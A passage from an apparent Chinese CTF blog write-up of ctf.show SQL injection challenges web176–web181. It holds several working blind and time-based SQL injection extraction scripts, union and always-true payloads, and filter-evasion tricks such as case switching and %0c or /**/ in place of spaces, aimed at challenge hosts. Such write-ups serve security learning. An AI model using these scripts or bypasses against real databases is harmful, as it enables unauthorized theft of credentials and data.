<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="keyword">import</span> datetime</span><br><span class="line">url = <span class="string">&quot;http://0fc6f65a-8908-4fd3-8819-623c7eaaba3c.challenge.ctf.show/api/v5.php?id=1&#x27; and &quot;</span></span><br><span class="line">result = <span class="string">&#x27;&#x27;</span></span><br><span class="line">i = <span class="number">0</span></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    i = i + <span class="number">1</span></span><br><span class="line">    head = <span class="number">32</span></span><br><span class="line">    tail = <span class="number">127</span></span><br><span class="line">    <span class="keyword">while</span> head &lt; tail:</span><br><span class="line">        mid = (head + tail) &gt;&gt; <span class="number">1</span></span><br><span class="line">        payload = <span class="string">f&#x27;if(ascii(substr((select group_concat(password) from ctfshow_user5 where username=&quot;flag&quot;),<span class="subst">&#123;i&#125;</span>,1))&gt;<span class="subst">&#123;mid&#125;</span>,sleep(1),1) --+&#x27;</span></span><br><span class="line">        t1=datetime.datetime.now()</span><br><span class="line">        r = requests.get(url + payload)</span><br><span class="line">        t2=datetime.datetime.now()</span><br><span class="line">        <span class="keyword">if</span> (t2-t1).seconds &gt; <span class="number">0.5</span>:</span><br><span class="line">            head = mid + <span class="number">1</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            tail = mid</span><br><span class="line">    <span class="keyword">if</span> head != <span class="number">32</span>:</span><br><span class="line">        result += <span class="built_in">chr</span>(head)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    <span class="built_in">print</span>(result)</span><br></pre></td></tr></table></figure>

<h4 id="反思-3"><a href="#反思-3" class="headerlink" title="反思"></a>反思</h4><p>1.这里首先第一个是<code>(t2-t1).seconds</code> 这个写法需要注意。</p>
<p>2.然后就是payload里面要加<code>group_concat()</code> 不然会报错，导致跑不出来，</p>
<p>3.第三个，因为时间盲注比较消耗时间，加上password字段对应的值有很多，所以这里我加了<code>where username=&#39;admin&#39;</code> 来做筛选。</p>
<h2 id="web176"><a href="#web176" class="headerlink" title="web176"></a>web176</h2><h3 id="解法一-3"><a href="#解法一-3" class="headerlink" title="解法一"></a>解法一</h3><p>只是查询的时候对username&#x3D;”flag”的数据做了限制，但是没有对返回显示的数据做限制，所以我们可以直接用或的语句去连接，虽然where username!&#x3D;’flag’ 这个语句使得flag那一行没出来，但是 or  1 这个语句 ，把所有的数据都显示在页面上。</p>
<p><code>?id=-1&#39;or 1--+</code>  </p>
<h3 id="解法二-2"><a href="#解法二-2" class="headerlink" title="解法二"></a>解法二</h3><p>手动去fuzz下可以发现select、group_concat啥的被过滤了。<del>所以这里可以就不用select了，直接从password字段里面去读数据。</del></p>
<p>这里我搞错了，虽然对select做了过滤，但是没有很严格区分大小写过滤，所以可以大写<code>Select</code>过滤，而这个题目仅仅只是对select做了一个过滤，没有区分大小写，所以我们可以大写绕过去。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">&quot;http://db16cc73-7180-4824-9e2a-9cc890fe17ed.challenge.ctf.show/api/?id=1&#x27;and &quot;</span></span><br><span class="line">result = <span class="string">&#x27;&#x27;</span></span><br><span class="line">i = <span class="number">0</span></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    i = i + <span class="number">1</span></span><br><span class="line">    head = <span class="number">32</span></span><br><span class="line">    tail = <span class="number">127</span></span><br><span class="line">    <span class="keyword">while</span> head &lt; tail:</span><br><span class="line">        mid = (head + tail) &gt;&gt; <span class="number">1</span></span><br><span class="line">        payload = <span class="string">f&#x27;if(ascii(substr((Select group_concat(password) from ctfshow_user where username=&quot;flag&quot;),<span class="subst">&#123;i&#125;</span>,1))&gt;<span class="subst">&#123;mid&#125;</span>,1,0) --+&#x27;</span></span><br><span class="line">        r = requests.get(url + payload)</span><br><span class="line">        <span class="built_in">print</span>(url+payload)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;admin&quot;</span> <span class="keyword">in</span> r.text:</span><br><span class="line">            head = mid + <span class="number">1</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            tail = mid</span><br><span class="line">    <span class="keyword">if</span> head != <span class="number">32</span>:</span><br><span class="line">        result += <span class="built_in">chr</span>(head)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    <span class="built_in">print</span>(result)</span><br></pre></td></tr></table></figure>

<h4 id="反思-4"><a href="#反思-4" class="headerlink" title="反思"></a>反思</h4><p>1.绕过的时候，先考虑有没有可能关键字没有被完全过滤？比如后台逻辑是替换，我们可以双写去绕过。后台逻辑没有区分大小写，我们可以大小写绕过。然后这些都不行，再去考虑换别的关键词。而不是一上来我们就以为select完全用不了了。</p>
<p>2.直接加group_concat(password)，这种语法是错的，得带上select group_concat(password) from xxx ，完整的一个句子。</p>
<p>3.substr(<strong>(select xx)</strong>,1,1)，记住套括号，直接 substr(select database(),1,1)，这样是不太行的，得用个括号把select database套起来。</p>
<h2 id="web177"><a href="#web177" class="headerlink" title="web177"></a>web177</h2><h3 id="解法一-4"><a href="#解法一-4" class="headerlink" title="解法一"></a>解法一</h3><p>在上题<code>web176</code>基础上，把空格过滤了。但是万能密码可以直接注出来。</p>
<p>payload: <code>?id=1&#39;or(1)%23</code></p>
<h3 id="解法二-3"><a href="#解法二-3" class="headerlink" title="解法二"></a>解法二</h3><p>过滤了空格，我们可以用<code>/**/、()、</code>来平替。脚本如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">&quot;http://1f8cf4dd-8308-41a9-85ab-60fc6b3036ba.challenge.ctf.show/api/?id=1&#x27;and/**/&quot;</span></span><br><span class="line">result = <span class="string">&#x27;&#x27;</span></span><br><span class="line">i = <span class="number">0</span></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    i = i + <span class="number">1</span></span><br><span class="line">    head = <span class="number">32</span></span><br><span class="line">    tail = <span class="number">127</span></span><br><span class="line">    <span class="keyword">while</span> head &lt; tail:</span><br><span class="line">        mid = (head + tail) &gt;&gt; <span class="number">1</span></span><br><span class="line">        payload = <span class="string">f&#x27;if(ascii(substr((Select/**/group_concat(password)/**/from/**/ctfshow_user/**/where/**/username=&quot;flag&quot;),<span class="subst">&#123;i&#125;</span>,1))&gt;<span class="subst">&#123;mid&#125;</span>,1,0)%23&#x27;</span></span><br><span class="line">        r = requests.get(url + payload)</span><br><span class="line">        <span class="built_in">print</span>(url+payload)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;admin&quot;</span> <span class="keyword">in</span> r.text:</span><br><span class="line">            head = mid + <span class="number">1</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            tail = mid</span><br><span class="line">    <span class="keyword">if</span> head != <span class="number">32</span>:</span><br><span class="line">        result += <span class="built_in">chr</span>(head)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    <span class="built_in">print</span>(result)</span><br></pre></td></tr></table></figure>

<h4 id="反思-5"><a href="#反思-5" class="headerlink" title="反思"></a>反思</h4><p>这个题目整体下来，一开始是知道过滤了空格，但是出了点问题导致没做出来。原因是因为我这里用的<code>()</code> 来绕过空格的，即<code>(select)database()</code>，其实这种用法是有点问题的，可能会有语法的报错。所以还是用的是<code>select/**/database()</code>，这种结构来bypass掉空格。</p>
<h3 id="解法三-1"><a href="#解法三-1" class="headerlink" title="解法三"></a>解法三</h3><p>union联合注入也是可以的奥。 </p>
<h2 id="web178"><a href="#web178" class="headerlink" title="web178"></a>web178</h2><h3 id="解法一-5"><a href="#解法一-5" class="headerlink" title="解法一"></a>解法一</h3><p>还是可以万能密码直接梭。<code>?id=1&#39;or(1)%23</code></p>
<h3 id="解法二-4"><a href="#解法二-4" class="headerlink" title="解法二"></a>解法二</h3><p>这个题目还是过滤掉了空格，在此基础上<code>/**/</code>也用不了了。所以这里用的是<code>%09</code> ，其实剩下的都是一样的套路了。</p>
<p>贴上脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">&quot;http://9eed38bd-0303-4c2a-9163-6e840ddf65bd.challenge.ctf.show/api/?id=1&#x27;and%09&quot;</span></span><br><span class="line">result = <span class="string">&#x27;&#x27;</span></span><br><span class="line">i = <span class="number">0</span></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    i = i + <span class="number">1</span></span><br><span class="line">    head = <span class="number">32</span></span><br><span class="line">    tail = <span class="number">127</span></span><br><span class="line">    <span class="keyword">while</span> head &lt; tail:</span><br><span class="line">        mid = (head + tail) &gt;&gt; <span class="number">1</span></span><br><span class="line">        payload = <span class="string">f&#x27;if(ascii(substr((Select%09group_concat(password)%09from%09ctfshow_user%09where%09username=&quot;flag&quot;),<span class="subst">&#123;i&#125;</span>,1))&gt;<span class="subst">&#123;mid&#125;</span>,1,0)%23&#x27;</span></span><br><span class="line">        r = requests.get(url + payload)</span><br><span class="line">        <span class="built_in">print</span>(url+payload)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;admin&quot;</span> <span class="keyword">in</span> r.text:</span><br><span class="line">            head = mid + <span class="number">1</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            tail = mid</span><br><span class="line">    <span class="keyword">if</span> head != <span class="number">32</span>:</span><br><span class="line">        result += <span class="built_in">chr</span>(head)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    <span class="built_in">print</span>(result)</span><br></pre></td></tr></table></figure>

<h3 id="解法三-2"><a href="#解法三-2" class="headerlink" title="解法三"></a>解法三</h3><p>依然可以用union联合注入：</p>
<p>payload:<code>?id=-1&#39;union%09select%091,2,3%23</code>，板子在这里，后面的就是根据这个去改。</p>
<h2 id="web179"><a href="#web179" class="headerlink" title="web179"></a>web179</h2><h3 id="解法一-6"><a href="#解法一-6" class="headerlink" title="解法一"></a>解法一</h3><p>依然可以万能密码直接梭：<code>?id=1&#39;(or)1%23</code></p>
<h3 id="解法二-5"><a href="#解法二-5" class="headerlink" title="解法二"></a>解法二</h3><p>过滤了空格，<code>/**/、%09、</code> 都用不了，但是可以尝试<code>%0a、%0b、%0c、%0d去绕过</code></p>
<p>这里经过测试，<code>%0c</code>是可以绕过的，剩下的脚本方法和上面是一样的。</p>
<h4 id="反思-6"><a href="#反思-6" class="headerlink" title="反思"></a>反思</h4><p>这里其实可以fuzz一下，想起最开始20年参加的那次国赛，当时有个题目，就是空格那里过不去，其实可以写个脚本去fuzz，根据回显来判断哪些是可以用的：</p>
<p>比如这里可以<code>?id=1&#39;and$X$1%23</code> ，这里的<code>$X$</code> 可以换成我们用来fuzz的字符。通过回显有admin。来判断是否成功。</p>
<h2 id="web180"><a href="#web180" class="headerlink" title="web180"></a>web180</h2><h3 id="解法一-7"><a href="#解法一-7" class="headerlink" title="解法一"></a>解法一</h3><p><code>#、%23</code> 用不了，这里可以用<code>--+</code>，不过这里的空格被过滤了，经过测试，发现<code>%0c</code>可以用。</p>
<p>payload: <code>?id=1&#39;||1--%0c</code></p>
<p>其他方式同上，就是换了个字符的问题。</p>
<h2 id="web181"><a href="#web181" class="headerlink" title="web181"></a>web181</h2><h3 id="解法一-8"><a href="#解法一-8" class="headerlink" title="解法一"></a>解法一</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//对传入的参数进行了过滤</span></span><br><span class="line">  <span class="function"><span class="keyword">function</span> <span class="title">waf</span>(<span class="params"><span class="variable">$str</span></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/ |\*|\x09|\x0a|\x0b|\x0c|\x00|\x0d|\xa0|\x23|\#|file|into|select/i&#x27;</span>, <span class="variable">$str</span>);</span><br><span class="line">  &#125;</span><br><span class="line">      </span><br></pre></td></tr></table></figure>

<p>其实这里咋一看，啥都给过滤了，很多都用不了，但是，经过测试发现<code>%0c</code>还是可以代替空格来用的。</p>
<p>payload:<code>?id=1&#39;or(1)--%0c</code>，因为这里的<code>#和%23</code> 都被过滤了，所以用的 <code>--%0c</code></p>
<h3 id="解法二-6"><a href="#解法二-6" class="headerlink" title="解法二"></a>解法二</h3><p>这个解法建立在我们知道<code>username</code>为flag那一行对应的id字段的值是26的情况下：</p>
<p>payload:<code>?id=-1&#39;or(id=26)and&#39;1&#39;=&#39;1</code>  。 这种写法就是没有去使用注释符，用引号去闭合。当然这里是用（）来做隔开，起到空格的效果，也可以换成<code>?id=-1&#39;or%0cid=26%0cand&#39;1&#39;=&#39;1&#39;</code>。同时要注意前面为啥用的-1，因为后面有个limit 1。限制只能输出一行。</p>
<p>其实哪怕不知道id也没事，只要能判断出flag是在某个id下，我们可以简单写个脚本来遍历一下id:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span>  requests</span><br><span class="line">url=<span class="string">&quot;http://ff6f89e7-0fa6-4da6-b589-312279425b2c.challenge.ctf.show/api/?id=-1&#x27;or(id=&#123;&#125;)and&#x27;1&quot;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">30</span>):</span><br><span class="line">    res = requests.get(url.<span class="built_in">format</span>(i))</span><br><span class="line">    <span class="keyword">if</span> <span class="string">&quot;ctfshow&quot;</span> <span class="keyword">in</span> res.text:</span><br><span class="line">        <span class="built_in">print</span>(i)</span><br><span class="line">        <span class="built_in">print</span>(res.text)</span><br></pre></td></tr></table></figure>



<h3 id="解法三及其他"><a href="#解法三及其他" class="headerlink" title="解法三及其他"></a>解法三及其他</h3><p>payload:  -1’or<code>username</code>&#x3D;’flag’and’1   &#x2F;&#x2F;注意这里显示的问题，username这个字段是加了反引号的。注意一下这种用法。不加反引号其实也行。只不过用括号隔开：<code>-1&#39;or(username)=&#39;flag&#39;and&#39;1</code></p>
<p>payload:<code>?id=-1&#39;or(username)like(&#39;flag&#39;)and&#39;1</code>  注意这里的like是全部匹配上才行。并且flag要带上引号。</p>
<p>payload:<code>?id=-1&#39;or(username)regexp(&#39;fl&#39;)and&#39;1</code> regexp就不需要完全匹配。</p>
<h3 id="反思-7"><a href="#反思-7" class="headerlink" title="反思"></a>反思</h3><p>1.题目哪怕告诉我们一些字符串被过滤了，但我们仍然可以尝试一下，根据实际环境来判断是否真的被过滤。比如这里的<code>%0c</code>其实就还可以用。</p>
<p>2.注释符被过滤，<code># %23 --+ --%0c --%09 --%0a --%0b --%0d</code> 这些可以换着用，当然如果都被过滤了，其实可以考虑不用注释符呗，用引号去闭合。</p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/sql%E6%B3%A8%E5%85%A5/" rel="tag"># sql注入</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2024/10/06/misc%E5%A4%8D%E7%8E%B0/" rel="prev" title="misc复现">
                  <i class="fa fa-angle-left"></i> misc复现
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2024/10/21/2024%E9%9B%86%E5%9B%A2%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E8%B5%9B%E5%86%B3%E8%B5%9B%E5%A4%8D%E7%8E%B0/" rel="next" title="2024集团网络安全攻防赛决赛复现">
                  2024集团网络安全攻防赛决赛复现 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2024</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">My0n9s</span>
  </div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/pisces/" rel="noopener" target="_blank">NexT.Pisces</a>
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/sidebar.js"></script><script src="/js/next-boot.js"></script>

  






  





</body>
</html>
